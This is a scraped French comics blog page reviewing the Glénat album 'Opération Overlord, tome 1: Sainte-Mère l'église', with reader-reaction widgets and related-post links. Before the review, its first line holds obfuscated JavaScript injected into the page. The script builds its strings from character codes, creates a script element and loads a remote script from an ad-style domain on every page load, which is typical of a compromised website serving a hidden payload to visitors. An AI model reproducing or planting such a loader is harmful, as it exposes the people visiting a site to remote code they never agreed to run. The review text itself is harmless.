Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    (Game) Overlord : le débarquement a mal commencé

    Opération Overlord, tome 1: Sainte-Mère l’église, Michaël Le Gall, Davide Fabbri, éditions Glénat, 48 pages, 13,90 euros.

    Si, en Picardie, la commémoration historique du moment oriente plutôt vers 14-18, l’actualité plus immédiate de cette fin de printemps sera marquée par le 70e anniversaire du débarquement de Normandie. Occasion d’un autre débarquement prévisible d’albums dans les rayonnages de bandes dessinées. Glénat s’y met avec la parution annoncée de trois albums autour du “D-Day”. Trois récits indépendants centrés sur un des objectifs stratégiques de l’opération, qui ambitionnent aussi de raconter la bataille à hauteur d’hommes.

    Premier saut avec Sainte-Mère l’église et les parachutistes américains de la 82e division aéroportée. Le récit débute très directement, le 4 juin, dans le camp de cantonnement britannique, autour de quelques personnages typiques, de la même compagnie : Woods, un lieutenant ex-flic engagé volontaire, Nixon, un sergent un brin raciste, forte tête s’étant engagé pour échapper à la prison mais au bon fond, Naquhaddy, un indien commanche “code talker”, un noir parti pour fuir le racisme de sa ville natale, etc. On va suivre tous ces personnages lors de leur première nuit et journée de combat pour prendre le clocher de Sainte-Mère l’Eglise…

    Cet album baigne dans l’ambiance virile des histoires de guerre dans le style du Jour le plus long. Mais sans le charme des bons vieux pulps et sans densité. Le récit – sans doute historiquement crédible – avance sans s’intéresser à ses personnages, à la personnalité esquissée en passant en une page de flash-back Et le dessin de l’Italien Davide Fabbri (qui a oeuvré jusqu’ici notamment sur les adaptations en BD de la licence Star Wars) se montre très rigide et passablement laid. Effet renforcé encore par des couleurs numériques sans nuances. A l’image des paras US tirés en vol dans le bocage normand, la première vague d’assaut paye souvent les pots cassés. C’est aussi le cas ici.

    Les deux autres tomes (sur Omaha Beach et la prise de la batterie de Merville) sont programmés pour sortir rapidement d’ici le mois de juin. De quoi redresser le tir ?

     

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Rêveurs lunaires et vulgarisation scientifique de haut vol

    Les rêveurs lunaires, Cédric Villani (scénario), Edmond Baudoin (dessin). Editions Gallimard/Grasset, 192 pages, 22 ...

    Myrmidon se recase chez le dragon

    Myrmidon dans l’antre du dragon, Loïc Dauvillier (scénario), Thierry Martin (dessin). Editions la Gouttière, ...

    Arleston, auteur le plus “bankable” pour “Le Figaro”

    Il n’aura échappé à personne que la bande dessinée est, aussi, une activité économique. ...

    Une colo’, mais pas des vacances

    Colo Bray-Dunes 1999, Dav Guedin, Craoman, éditions Delcourt, Coll. Shampoing, 112 pages, 14.30 euros. ...

    Qui a bu boira !

    My lady vampire, tome  2 : Poupée de crinoline, Audrey Alwett et Silvestro Nocolaci. Editions ...

    Des vikings du côté de Sherwood

    Walhalla, tome 2: du côté de Sherwood, Nicolas Pothier (scénario), Marc Lechuga (dessin). Editions ...